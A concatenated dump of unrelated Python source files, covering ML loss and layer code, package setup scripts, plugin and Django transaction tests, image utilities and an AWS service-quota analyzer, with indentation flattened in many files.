# plot_training_curves are assumed to be defined elsewhere in the notebook.
def regularized_MSE_loss(output, target, weights=None, L2_penalty=0, L1_penalty=0):
"""loss function for MSE
Args:
output (torch.Tensor): output of network
target (torch.Tensor): neural response network is trying to predict
weights (torch.Tensor): fully-connected layer weights of network (net.out_layer.weight)
L2_penalty : scaling factor of sum of squared weights
    L1_penalty : scaling factor for sum of absolute weights
Returns:
(torch.Tensor) mean-squared error with L1 and L2 penalties added
"""
loss_fn = nn.MSELoss()
loss = loss_fn(output, target)
if weights is not None:
L2 = L2_penalty * torch.square(weights).sum()
L1 = L1_penalty * torch.abs(weights).sum()
loss += L1 + L2
return loss
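# --- Sanity-check sketch (added for illustration; the dummy shapes below are
# arbitrary and unrelated to the notebook's real stimulus/response data) ---
_dummy_out = torch.randn(8, 10)
_dummy_target = torch.randn(8, 10)
_dummy_weights = torch.randn(10, 20)
_plain = regularized_MSE_loss(_dummy_out, _dummy_target)
_penalized = regularized_MSE_loss(_dummy_out, _dummy_target, weights=_dummy_weights,
                                  L2_penalty=1e-4, L1_penalty=1e-6)
# The L1/L2 terms are non-negative, so the penalized loss can never be smaller.
assert _penalized.item() >= _plain.item()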
# Initialize network
net = ConvFC(n_neurons)
# Train network
train_loss, test_loss = train(net, regularized_MSE_loss, stim_binary, resp_train,
test_data=stim_binary, test_labels=resp_test,
learning_rate=10, n_iter=500,
L2_penalty=1e-4, L1_penalty=1e-6)
# Plot the training loss over iterations of GD
with plt.xkcd():
plot_training_curves(train_loss, test_loss)
|
67807
|
import numpy as np
import tensorflow as tf
class batch_norm(object):
"""Code modification of http://stackoverflow.com/a/33950177"""
def __init__(self, epsilon=1e-5, momentum = 0.9, name="batch_norm"):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)
self.name = name
def __call__(self, x, train=True):
shape = x.get_shape().as_list()
if train:
with tf.variable_scope(self.name) as scope:
self.beta = tf.get_variable("beta", [shape[-1]],
initializer=tf.constant_initializer(0.))
self.gamma = tf.get_variable("gamma", [shape[-1]],
initializer=tf.random_normal_initializer(1., 0.02))
batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name='moments')
ema_apply_op = self.ema.apply([batch_mean, batch_var])
self.ema_mean, self.ema_var = self.ema.average(batch_mean), self.ema.average(batch_var)
with tf.control_dependencies([ema_apply_op]):
mean, var = tf.identity(batch_mean), tf.identity(batch_var)
else:
mean, var = self.ema_mean, self.ema_var
normed = tf.nn.batch_norm_with_global_normalization(
x, mean, var, self.beta, self.gamma, self.epsilon, scale_after_normalization=True)
return normed
# standard convolution layer
def conv2d(x, filter_size, stride, inputFeatures, outputFeatures, name):
with tf.variable_scope(name):
w = tf.get_variable("w",[filter_size,filter_size,inputFeatures, outputFeatures], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputFeatures], initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(x, w, strides=[1,stride,stride,1], padding="SAME") + b
return conv
def conv_transpose(x, filter_size, stride, outputShape, name):
with tf.variable_scope(name):
# h, w, out, in
w = tf.get_variable("w",[filter_size,filter_size, outputShape[-1], x.get_shape()[-1]], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputShape[-1]], initializer=tf.constant_initializer(0.0))
convt = tf.nn.conv2d_transpose(x, w, output_shape=outputShape, strides=[1,stride,stride,1])
return convt
# leaky reLu unit
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# fully-connected layer
def dense(x, inputFeatures, outputFeatures, scope=None, with_w=False):
with tf.variable_scope(scope or "Linear"):
matrix = tf.get_variable("Matrix", [inputFeatures, outputFeatures], tf.float32, tf.random_normal_initializer(stddev=0.02))
bias = tf.get_variable("bias", [outputFeatures], initializer=tf.constant_initializer(0.0))
if with_w:
return tf.matmul(x, matrix) + bias, matrix, bias
else:
return tf.matmul(x, matrix) + bias
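# --- Usage sketch (illustrative; assumes a TF1.x graph-mode session). The
# layer sizes, names, and the 32x32x3 input shape are arbitrary examples. ---
def tiny_discriminator(images):
    # images: [batch, 32, 32, 3] -> conv (stride 2, SAME) -> [batch, 16, 16, 16]
    h0 = lrelu(conv2d(images, filter_size=5, stride=2,
                      inputFeatures=3, outputFeatures=16, name="d_conv0"))
    h0_flat = tf.reshape(h0, [-1, 16 * 16 * 16])
    # Single logit per image from the fully-connected head.
    return dense(h0_flat, inputFeatures=16 * 16 * 16, outputFeatures=1, scope="d_fc")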
|
67815
|
from setuptools import setup, find_packages
setup(
name="commandment",
version="0.1",
description="Commandment is an Open Source Apple MDM server with support for managing iOS and macOS devices",
packages=['commandment'],
include_package_data=True,
author="mosen",
license="MIT",
url="https://github.com/cmdmnt/commandment",
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
keywords='MDM',
install_requires=[
'acme==0.34.2',
'alembic==1.0.10',
'apns2-client==0.5.4',
'asn1crypto==0.24.0',
'authlib==0.11',
'biplist==1.0.3',
'blinker>=1.4',
'cryptography==2.6.1',
'flask==1.0.3',
'flask-alembic==2.0.1',
'flask-cors==3.0.4',
'flask-jwt==0.3.2',
'flask-marshmallow==0.10.1',
'flask-rest-jsonapi==0.29.0',
'flask-sqlalchemy==2.4.0',
'marshmallow==2.18.0',
'marshmallow-enum==1.4.1',
'marshmallow-jsonapi==0.21.0',
'marshmallow-sqlalchemy==0.16.3',
'oscrypto==0.19.1',
'passlib==1.7.1',
'requests==2.22.0',
'semver',
'sqlalchemy==1.3.3',
'typing==3.6.4'
],
python_requires='>=3.6',
tests_require=[
'factory-boy==2.10.0',
'faker==0.8.10',
'mock==2.0.0',
        'mypy==0.560',
        'pytest==3.4.0',
        'pytest-runner==3.0'
],
    extras_require={
'ReST': [
'sphinx-rtd-theme',
'guzzle-sphinx-theme',
'sadisplay==0.4.8',
'sphinx==1.7.0b2',
'sphinxcontrib-httpdomain==1.6.0',
'sphinxcontrib-napoleon==0.6.1',
'sphinxcontrib-plantuml==0.10',
],
'macOS': [
'pyobjc'
]
},
setup_requires=['pytest-runner'],
entry_points={
'console_scripts': [
'commandment=commandment.cli:server',
'appmanifest=commandment.pkg.appmanifest:main',
]
},
zip_safe=False
)
|
67874
|
from streamlink.plugins.oneplusone import OnePlusOne
from tests.plugins import PluginCanHandleUrl
class TestPluginCanHandleUrlOnePlusOne(PluginCanHandleUrl):
__plugin__ = OnePlusOne
should_match = [
"https://1plus1.video/ru/tvguide/plusplus/online",
"https://1plus1.video/tvguide/1plus1/online",
"https://1plus1.video/tvguide/2plus2/online",
"https://1plus1.video/tvguide/bigudi/online",
"https://1plus1.video/tvguide/plusplus/online",
"https://1plus1.video/tvguide/sport/online",
"https://1plus1.video/tvguide/tet/online",
"https://1plus1.video/tvguide/uniantv/online",
]
should_not_match = [
"https://1plus1.video/",
]
|
67884
|
def hey(phrase):
phrase = phrase.strip()
if not phrase:
return "Fine. Be that way!"
elif phrase.isupper():
return "Whoa, chill out!"
elif phrase.endswith("?"):
return "Sure."
else:
return 'Whatever.'
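# --- Illustrative checks (added; the phrases are arbitrary examples) ---
assert hey("Tom-ay-to, tom-aaaah-to.") == "Whatever."
assert hey("WATCH OUT!") == "Whoa, chill out!"
assert hey("Does this cryogenic chamber make me look fat?") == "Sure."
assert hey("   ") == "Fine. Be that way!"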
|
67892
|
from poop.hfdp.command.undo.command import Command
from poop.hfdp.command.undo.nocommand import NoCommand
class RemoteControlWithUndo:
def __init__(self) -> None:
no_command = NoCommand()
self.__on_commands: list[Command] = [no_command for _ in range(7)]
self.__off_commands: list[Command] = [no_command for _ in range(7)]
self.__undo_command: Command = no_command
def set_command(
self, slot: int, on_command: Command, off_command: Command
) -> None:
self.__on_commands[slot] = on_command
self.__off_commands[slot] = off_command
def on_button_was_pushed(self, slot: int) -> None:
self.__on_commands[slot].execute()
self.__undo_command = self.__on_commands[slot]
def off_button_was_pushed(self, slot: int) -> None:
self.__off_commands[slot].execute()
self.__undo_command = self.__off_commands[slot]
def undo_button_was_pushed(self) -> None:
self.__undo_command.undo()
def __str__(self) -> str:
title = "\n------ Remote Control ------\n"
on_commands = self.__on_commands
off_commands = self.__off_commands
commands = "\n".join(
f"[slot {index}] {on_commands[index].__class__.__qualname__} "
f"{off_commands[index].__class__.__qualname__}"
for index in range(7)
)
undo = f"Undo: {self.__undo_command.__class__.__qualname__}"
return f"{title}\n{commands}\n{undo}"
|
67945
|
import os
import pytest
import nucleus
from tests.helpers import TEST_DATASET_ITEMS, TEST_DATASET_NAME
assert "NUCLEUS_PYTEST_API_KEY" in os.environ, (
"You must set the 'NUCLEUS_PYTEST_API_KEY' environment variable to a valid "
"Nucleus API key to run the test suite"
)
API_KEY = os.environ["NUCLEUS_PYTEST_API_KEY"]
@pytest.fixture(scope="session")
def CLIENT():
client = nucleus.NucleusClient(API_KEY)
return client
@pytest.fixture()
def dataset(CLIENT):
ds = CLIENT.create_dataset(TEST_DATASET_NAME)
ds.append(TEST_DATASET_ITEMS)
yield ds
CLIENT.delete_dataset(ds.id)
if __name__ == "__main__":
client = nucleus.NucleusClient(API_KEY)
# ds = client.create_dataset("Test Dataset With Autotags")
# ds.append(TEST_DATASET_ITEMS)
ds = client.get_dataset("ds_c5jwptkgfsqg0cs503z0")
job = ds.create_image_index()
job.sleep_until_complete()
print(ds.id)
|
67963
|
from django import forms
class SampleSearchForm(forms.Form):
"""Search form for test purposes"""
query = forms.CharField(widget=forms.TextInput(attrs={'class': 'input-xlarge search-query',
'autocomplete': 'off'}))
|
67981
|
import numpy as np
from skimage.transform import resize
from scipy.ndimage import zoom  # used by resize_image for arrays with more than 3 channels
import skimage
import torchvision.utils as tvutils
import torch
import PIL
import PIL.PngImagePlugin  # needed for the PngImageFile type check in resize_image
from PIL import Image
import torchvision
class UnNormalize(object):
def __init__(self, mean, std):
self.mean = torch.tensor(mean).unsqueeze(0).unsqueeze(2).unsqueeze(3)
self.std = torch.tensor(std).unsqueeze(0).unsqueeze(2).unsqueeze(3)
def __call__(self, tensor):
"""
Args:
            tensor (Tensor): Normalized tensor image of size (C, H, W) or (B, C, H, W) to be un-normalized.
        Returns:
            Tensor: Un-normalized image.
"""
# for t, m, s in zip(tensor, self.mean, self.std):
# t * s + m
# # The normalize code -> t.sub_(m).div_(s)
return tensor * self.std.to(tensor.device) + self.mean.to(tensor.device)
imagenet_unnormalize = UnNormalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
taskononomy_unnormalize = UnNormalize([0.5,0.5,0.5], [0.5, 0.5, 0.5])
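# --- Usage sketch (illustrative helper, not part of the original module; the
# tensor sizes are arbitrary) ---
def _demo_unnormalize():
    mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
    batch = torch.rand(2, 3, 8, 8)
    # Apply torchvision-style normalization by hand, then undo it.
    normed = (batch - torch.tensor(mean).view(1, 3, 1, 1)) / torch.tensor(std).view(1, 3, 1, 1)
    restored = imagenet_unnormalize(normed)
    assert torch.allclose(restored, batch, atol=1e-6)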
def log_input_images(obs_unpacked, mlog, num_stack, key_names=['map'], meter_name='debug/input_images', step_num=0, reset_meter=True, phase='train', unnormalize=taskononomy_unnormalize):
# Plots the observations from the first process
stacked = []
for key_name in key_names:
if key_name not in obs_unpacked:
print(key_name, "not found")
continue
obs = obs_unpacked[key_name][0]
obs = (obs + 1.0) / 2.0
# obs = unnormalize(obs)
# obs = (obs * 2. - 1.)
try:
obs = obs.cpu()
except:
pass
obs_chunked = list(torch.chunk(obs, num_stack, dim=0))
if obs_chunked[0].shape[2] == 1 or obs_chunked[0].shape[2] == 3:
obs_chunked = [o.permute(2, 0, 1) for o in obs_chunked]
obs_chunked = [hacky_resize(obs) for obs in obs_chunked]
key_stacked = torchvision.utils.make_grid(obs_chunked, nrow=num_stack, padding=2)
stacked.append(key_stacked)
stacked = torch.cat(stacked, dim=1)
mlog.update_meter(stacked, meters={meter_name}, phase=phase)
if reset_meter:
mlog.reset_meter(step_num, meterlist={meter_name})
def hacky_resize(obs: torch.Tensor) -> torch.Tensor:
obs_img_format = np.transpose((255 * obs.cpu().numpy()).astype(np.uint8), (1,2,0))
obs_resized = torch.Tensor(np.array(Image.fromarray(obs_img_format).resize((84,84))).astype(np.float32)).permute((2,0,1))
return obs_resized / 255.
def rescale_for_display( batch, rescale=True, normalize=False ):
'''
Prepares network output for display by optionally rescaling from [-1,1],
and by setting some pixels to the min/max of 0/1. This prevents matplotlib
from rescaling the images.
'''
if rescale:
display_batch = [ rescale_image( im.copy(), new_scale=[0, 1], current_scale=[-1, 1] )
for im in batch ]
else:
display_batch = batch.copy()
if not normalize:
for im in display_batch:
im[0,0,0] = 1.0 # Adjust some values so that matplotlib doesn't rescale
im[0,1,0] = 0.0 # Now adjust the min
return display_batch
def rescale_image(im, new_scale=[-1.,1.], current_scale=None, no_clip=False):
"""
Rescales an image pixel values to target_scale
Args:
        im: A np.float32 array, assumed between [0,1]
new_scale: [min,max]
current_scale: If not supplied, it is assumed to be in:
[0, 1]: if dtype=float
[0, 2^16]: if dtype=uint
[0, 255]: if dtype=ubyte
Returns:
rescaled_image
"""
# im = im.astype(np.float32)
if current_scale is not None:
min_val, max_val = current_scale
if not no_clip:
im = np.clip(im, min_val, max_val)
im = im - min_val
im /= (max_val - min_val)
min_val, max_val = new_scale
im *= (max_val - min_val)
im += min_val
im = skimage.img_as_float(im)
return im
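# --- Usage sketch (illustrative helper; the input array is synthetic) ---
def _demo_rescale_image():
    # Map a [-1, 1] image into [0, 1], mirroring what rescale_for_display does.
    im = np.linspace(-1.0, 1.0, 12, dtype=np.float32).reshape(2, 2, 3)
    rescaled = rescale_image(im.copy(), new_scale=[0, 1], current_scale=[-1, 1])
    assert rescaled.min() >= 0.0 and rescaled.max() <= 1.0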
def resize_image(im, new_dims, interp_order=1):
"""
Resize an image array with interpolation.
Parameters
----------
im : (H x W x K) ndarray
new_dims : (height, width) tuple of new dimensions.
interp_order : interpolation order, default is linear.
Returns
-------
im : resized ndarray with shape (new_dims[0], new_dims[1], K)
By kchen @ https://github.com/kchen92/joint-representation/blob/24b30ca6963d2ec99618af379c1e05e1f7026710/lib/data/input_pipeline_feed_dict.py
"""
if type(im) == PIL.PngImagePlugin.PngImageFile:
interps = [PIL.Image.NEAREST, PIL.Image.BILINEAR]
return skimage.util.img_as_float(im.resize(new_dims, interps[interp_order]))
if all( new_dims[i] == im.shape[i] for i in range( len( new_dims ) ) ):
resized_im = im #return im.astype(np.float32)
elif im.shape[-1] == 1 or im.shape[-1] == 3:
# # skimage is fast but only understands {1,3} channel images
resized_im = resize(im, new_dims, order=interp_order, preserve_range=True)
else:
# ndimage interpolates anything but more slowly.
scale = tuple(np.array(new_dims, dtype=float) / np.array(im.shape[:2]))
resized_im = zoom(im, scale + (1,), order=interp_order)
# resized_im = resized_im.astype(np.float32)
return resized_im
def resize_rescale_image(img, new_dims, new_scale, interp_order=1, current_scale=None, no_clip=False):
"""
    Resize an image array with interpolation, and rescale its values
    to the range given by `new_scale`.
Parameters
----------
im : (H x W x K) ndarray
new_dims : (height, width) tuple of new dimensions.
new_scale : (min, max) tuple of new scale.
interp_order : interpolation order, default is linear.
Returns
-------
im : resized ndarray with shape (new_dims[0], new_dims[1], K)
"""
img = skimage.img_as_float( img )
img = resize_image( img, new_dims, interp_order )
img = rescale_image( img, new_scale, current_scale=current_scale, no_clip=no_clip )
return img
def pack_images(x, prediction, label, mask=None):
uncertainty = None
if isinstance(prediction, tuple):
prediction, uncertainty = prediction
if len(label.shape) == 4 and label.shape[1] == 2:
zeros = torch.zeros(label.shape[0], 1, label.shape[2], label.shape[3]).to(label.device)
label = torch.cat([label, zeros], dim=1)
prediction = torch.cat([prediction, zeros], dim=1)
if uncertainty is not None:
uncertainty = torch.cat([uncertainty, zeros], dim=1)
if mask is not None:
mask = torch.cat([mask, mask[:,0].unsqueeze(1)], dim=1)
if len(x.shape) == 4 and x.shape[1] == 2:
zeros = torch.zeros(x.shape[0], 1, x.shape[2], x.shape[3]).to(x.device)
x = torch.cat([x, zeros], dim=1)
to_cat = []
if x.shape[1] <= 3:
to_cat.append(x)
shape_with_three_channels = list(x.shape)
shape_with_three_channels[1] = 3
to_cat.append(prediction.expand(shape_with_three_channels))
if uncertainty is not None:
print(uncertainty.min(), uncertainty.max())
uncertainty = 2*uncertainty - 1.0
uncertainty = uncertainty.clamp(min=-1.0, max=1.0)
to_cat.append(uncertainty.expand(shape_with_three_channels))
to_cat.append(label.expand(shape_with_three_channels))
if mask is not None:
to_cat.append(mask.expand(shape_with_three_channels))
# print([p.shape for p in to_cat])
im_samples = torch.cat(to_cat, dim=3)
im_samples = tvutils.make_grid(im_samples.detach().cpu(), nrow=1, padding=2)
return im_samples
def maybe_entriple(x, is_mask=False):
if x.shape[1] == 2:
if is_mask:
x = torch.cat([x, x[:,0].unsqueeze(1)], dim=1)
else:
zeros = torch.zeros(x.shape[0], 1, x.shape[2], x.shape[3]).to(x.device)
x = torch.cat([x, zeros], dim=1)
shape_with_three_channels = list(x.shape)
shape_with_three_channels[1] = 3
return x.expand(shape_with_three_channels)
def pack_chained_images(x, predictions, labels, mask=None):
x = maybe_entriple(x)
if mask is not None:
mask = maybe_entriple(mask, is_mask=True)
tripled_predictions, uncertainties = [], []
for p in predictions:
if isinstance(p, tuple):
p, u = p
uncertainties.append(maybe_entriple(u))
else:
uncertainties.append(None)
tripled_predictions.append(maybe_entriple(p))
predictions = tripled_predictions
labels = [maybe_entriple(l) for l in labels]
to_cat = []
if x.shape[1] <= 3:
to_cat.append(x)
for pred, uncert, label in zip(predictions, uncertainties, labels):
to_cat.append(label)
to_cat.append(pred)
if uncert is not None:
print(uncert.min(), uncert.max())
uncert = 2*uncert - 1.0
uncert = uncert.clamp(min=-1.0, max=1.0)
to_cat.append(uncert)
if mask is not None:
to_cat.append(mask)
# print([p.shape for p in to_cat])
im_samples = torch.cat(to_cat, dim=3)
im_samples = tvutils.make_grid(im_samples.detach().cpu(), nrow=1, padding=2)
return im_samples
|
68031
|
import sqlmlutils
connection=sqlmlutils.ConnectionInfo(server="localhost",database="Test")
sqlmlutils.SQLPackageManager(connection).install("textblob")
|
68037
|
from setuptools import setup, find_packages
"""
Instructions for creating a release of the scispacy library.
1. Make sure your working directory is clean.
2. Make sure that you have changed the versions in "scispacy/version.py".
3. Create the distribution by running "python setup.py sdist" in the root of the repository.
4. Check you can install the new distribution in a clean environment.
5. Upload the distribution to pypi by running "twine upload <path to the distribution> -u <username> -p <password>".
   This step will ask you for a username and password - the username is "scispacy" and you
   can get the password from LastPass.
"""
VERSION = {}
# version.py defines VERSION and VERSION_SHORT variables.
# We use exec here to read it so that we don't import scispacy
# whilst setting up the package.
with open("scispacy/version.py", "r") as version_file:
exec(version_file.read(), VERSION)
setup(
name="scispacy",
version=VERSION["VERSION"],
url="https://allenai.github.io/SciSpaCy/",
author="Allen Institute for Artificial Intelligence",
author_email="<EMAIL>",
description="A full SpaCy pipeline and models for scientific/biomedical documents.",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
keywords=["bioinformatics nlp spacy SpaCy biomedical"],
classifiers=[
"Intended Audience :: Science/Research",
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
license="Apache",
install_requires=[
"spacy>=3.0.0,<3.1.0",
"requests>=2.0.0,<3.0.0",
"conllu",
"numpy",
"joblib",
"nmslib>=1.7.3.6",
"scikit-learn>=0.20.3",
"pysbd",
],
tests_require=["pytest", "pytest-cov", "flake8", "black", "mypy"],
python_requires=">=3.6.0",
)
|
68073
|
from concurrent.futures.thread import ThreadPoolExecutor
from typing import List
from provider.aws.common_aws import get_paginator
from provider.aws.limit.command import LimitOptions
from provider.aws.limit.data.allowed_resources import (
ALLOWED_SERVICES_CODES,
FILTER_EC2_BIGFAMILY,
SPECIAL_RESOURCES,
)
from shared.common import (
ResourceProvider,
Resource,
ResourceDigest,
message_handler,
ResourceCache,
LimitsValues,
)
from shared.error_handler import exception
SERVICEQUOTA_TO_BOTO3 = {
"elasticloadbalancing": "elbv2",
"elasticfilesystem": "efs",
"vpc": "ec2",
"codeguru-profiler": "codeguruprofiler",
"AWSCloudMap": "servicediscovery",
"ebs": "ec2",
}
MAX_EXECUTION_PARALLEL = 2
class LimitResources(ResourceProvider):
def __init__(self, options: LimitOptions):
"""
All resources
:param options:
"""
super().__init__()
self.options = options
self.cache = ResourceCache()
@exception
# pylint: disable=too-many-locals
def get_resources(self) -> List[Resource]:
threshold_requested = (
0 if self.options.threshold is None else self.options.threshold
)
client_quota = self.options.client("service-quotas")
resources_found = []
services = self.options.services
with ThreadPoolExecutor(MAX_EXECUTION_PARALLEL) as executor:
results = executor.map(
lambda service_name: self.analyze_service(
service_name=service_name,
client_quota=client_quota,
threshold_requested=int(threshold_requested),
),
services,
)
for result in results:
if result is not None:
resources_found.extend(result)
return resources_found
@exception
def analyze_service(self, service_name, client_quota, threshold_requested):
if service_name in SPECIAL_RESOURCES:
return []
cache_key = "aws_limits_" + service_name + "_" + self.options.region_name
cache = self.cache.get_key(cache_key)
resources_found = []
if service_name not in cache:
return []
"""
        Services that must be enabled in your account. Calls to these services will fail if you don't enable them:
Fraud Detector: https://pages.awscloud.com/amazon-fraud-detector-preview.html#
AWS Organizations: https://console.aws.amazon.com/organizations/
"""
if service_name in ("frauddetector", "organizations"):
message_handler(
"Attention: Service "
+ service_name
+ " must be enabled to use API calls.",
"WARNING",
)
for data_quota_code in cache[service_name]:
if data_quota_code is None:
continue
resource_found = self.analyze_quota(
client_quota=client_quota,
data_quota_code=data_quota_code,
service=service_name,
threshold_requested=threshold_requested,
)
if resource_found is not None:
resources_found.append(resource_found)
return resources_found
@exception
# pylint: disable=too-many-locals,too-many-statements
def analyze_quota(
self, client_quota, data_quota_code, service, threshold_requested
):
resource_found = None
quota_data = ALLOWED_SERVICES_CODES[service][data_quota_code["quota_code"]]
value_aws = value = data_quota_code["value"]
        # Quota is adjustable by ticket request, so we must override these values.
if bool(data_quota_code["adjustable"]) is True:
try:
response_quota = client_quota.get_service_quota(
ServiceCode=service, QuotaCode=data_quota_code["quota_code"]
)
if "Value" in response_quota["Quota"]:
value = response_quota["Quota"]["Value"]
else:
value = data_quota_code["value"]
except client_quota.exceptions.NoSuchResourceException:
value = data_quota_code["value"]
if self.options.verbose:
message_handler(
"Collecting data from Quota: "
+ service
+ " - "
+ data_quota_code["quota_name"]
+ "...",
"HEADER",
)
        # Need to convert some Service Quotas service codes to their boto3 client names
if service in SERVICEQUOTA_TO_BOTO3:
service = SERVICEQUOTA_TO_BOTO3.get(service)
"""
        AWS Network Manager is a global service and only allows region us-west-2 instead of us-east-1
Reference https://docs.aws.amazon.com/networkmanager/latest/APIReference/Welcome.html
TODO: If we detect more resources like that, convert it into a dict
"""
if service == "networkmanager":
region_boto3 = "us-west-2"
else:
region_boto3 = self.options.region_name
client = self.options.session.client(service, region_name=region_boto3)
usage = 0
# Check filters by resource
if "filter" in quota_data:
filters = quota_data["filter"]
else:
filters = None
pages = get_paginator(
client=client,
operation_name=quota_data["method"],
resource_type="aws_limit",
filters=filters,
)
if not pages:
if filters:
response = getattr(client, quota_data["method"])(**filters)
else:
response = getattr(client, quota_data["method"])()
            # If the fields element is not empty, sum its values instead of using the list length
if quota_data["fields"]:
for item in response[quota_data["method"]]:
usage = usage + item[quota_data["fields"]]
else:
usage = len(response[quota_data["key"]])
else:
for page in pages:
if quota_data["fields"]:
if len(page[quota_data["key"]]) > 0:
usage = usage + page[quota_data["key"]][0][quota_data["fields"]]
else:
usage = usage + len(page[quota_data["key"]])
# Value for division
if "divisor" in quota_data:
usage = usage / quota_data["divisor"]
"""
        Hack to work around the boto3 limit of 200 items per filter.
Quota L-1216C47A needs more than 200 items. Not happy with this code
TODO: Refactor this piece of terrible code.
"""
if data_quota_code["quota_code"] == "L-1216C47A":
filters = FILTER_EC2_BIGFAMILY["filter"]
pages = get_paginator(
client=client,
operation_name=quota_data["method"],
resource_type="aws_limit",
filters=filters,
)
if not pages:
response = getattr(client, quota_data["method"])(**filters)
usage = len(response[quota_data["key"]])
else:
for page in pages:
usage = usage + len(page[quota_data["key"]])
try:
percent = round((usage / value) * 100, 2)
except ZeroDivisionError:
percent = 0
if percent >= threshold_requested:
resource_found = Resource(
digest=ResourceDigest(
id=data_quota_code["quota_code"], type="aws_limit"
),
name="",
group="",
limits=LimitsValues(
quota_name=data_quota_code["quota_name"],
quota_code=data_quota_code["quota_code"],
aws_limit=int(value_aws),
local_limit=int(value),
usage=int(usage),
service=service,
percent=percent,
),
)
return resource_found
|
68118
|
from setuptools import setup, find_packages
import sys
import os
VERSION = '1.6'
# Cython has to be installed beforehand, and I could not find any other way.
os.system('pip install cython')
from Cython.Build import cythonize
if sys.version_info[0] < 3:
raise Exception('Must be using Python 3.')
setup(name='lead-lag',
version=VERSION,
ext_modules=cythonize("lead_lag/lead_lag_impl.pyx", language_level="3"),
      description='Lead lag estimation with O(n log n) complexity.',
author='<NAME>',
license='Open Source',
packages=find_packages(),
include_package_data=True,
install_requires=[
'pandas>=0.22.0',
'numpy>=1.15.0',
'tqdm>=4.19.2',
'matplotlib>=2.2.2',
])
|
68148
|
import os
print(os.getcwd())
l = os.listdir()
print(l)
assert "test_dirs.py" in l
assert "os" in l
for t in os.walk("."):
print(t)
for t in os.walk(".", False):
print(t)
|
68173
|
def extractNovelsJapan(item):
"""
'Novels Japan'
"""
if item['title'].endswith(' (Sponsored)'):
item['title'] = item['title'][:-1 * len(' (Sponsored)')]
if item['title'].endswith(' and Announcement'):
item['title'] = item['title'][:-1 * len(' and Announcement')]
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or 'preview' in item['title'].lower():
return None
if item['title'].lower().endswith('loner dungeon'):
return buildReleaseMessageWithType(item, 'I who is a Loner, Using cheats adapts to the Dungeon', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().endswith('vending machine'):
return buildReleaseMessageWithType(item, 'I was Reborn as a Vending Machine, Wandering in the Dungeon', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().endswith('login bonus'):
return buildReleaseMessageWithType(item, 'Skill Up with Login Bonus', vol, chp, frag=frag, postfix=postfix)
if item['title'].lower().endswith('lv2 cheat') or item['title'].lower().endswith(
'ex-hero candidate’s, who turned out to be a cheat from lv2, laid-back life in another world') or 'Lv2 Cheat' in item['tags']:
return buildReleaseMessageWithType(item, "Ex-Hero Candidate's, Who Turned Out To Be A Cheat From Lv2, Laid-back Life In Another World", vol, chp, frag=frag, postfix=postfix)
if 'Second Earth' in item['tags']:
return buildReleaseMessageWithType(item, 'Second Earth', vol, chp, frag=frag, postfix=postfix)
if 'Strongest Revolution' in item['tags']:
return buildReleaseMessageWithType(item, 'The Fierce Revolution ~ The Strongest Organism Which Can Kill the Devil and the Hero', vol, chp, frag=frag, postfix=postfix)
if 'Loner Dungeon' in item['tags']:
return buildReleaseMessageWithType(item, 'I who is a Loner, Using cheats adapts to the Dungeon', vol, chp, frag=frag, postfix=postfix)
if 'Skill Up' in item['tags']:
return buildReleaseMessageWithType(item, 'Skill Up with Login Bonus', vol, chp, frag=frag, postfix=postfix)
if 'Isobe Isobee' in item['tags']:
return buildReleaseMessageWithType(item, 'Isobe Isobee', vol, chp, frag=frag, postfix=postfix)
if 'Ex-hero' in item['tags']:
return buildReleaseMessageWithType(item, "Ex-Hero Candidate's, Who Turned Out To Be A Cheat From Lv2, Laid-back Life In Another World", vol, chp, frag=frag, postfix=postfix)
return False
|
68206
|
from __future__ import absolute_import
import sys
try:
import threading
except ImportError:
threading = None
import time
from django.db import (connection, transaction,
DatabaseError, Error, IntegrityError, OperationalError)
from django.test import TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature
from django.test.utils import IgnorePendingDeprecationWarningsMixin
from django.utils import six
from django.utils.unittest import skipIf, skipUnless
from .models import Reporter
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicTests(TransactionTestCase):
"""
Tests for the atomic decorator and context manager.
The tests make assertions on internal attributes because there isn't a
robust way to ask the database for its current transaction state.
Since the decorator syntax is converted into a context manager (see the
implementation), there are only a few basic tests with the decorator
syntax and the bulk of the tests use the context manager syntax.
"""
available_apps = ['transactions']
def test_decorator_syntax_commit(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_decorator_syntax_rollback(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_alternate_decorator_syntax_commit(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_alternate_decorator_syntax_rollback(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_commit(self):
with transaction.atomic():
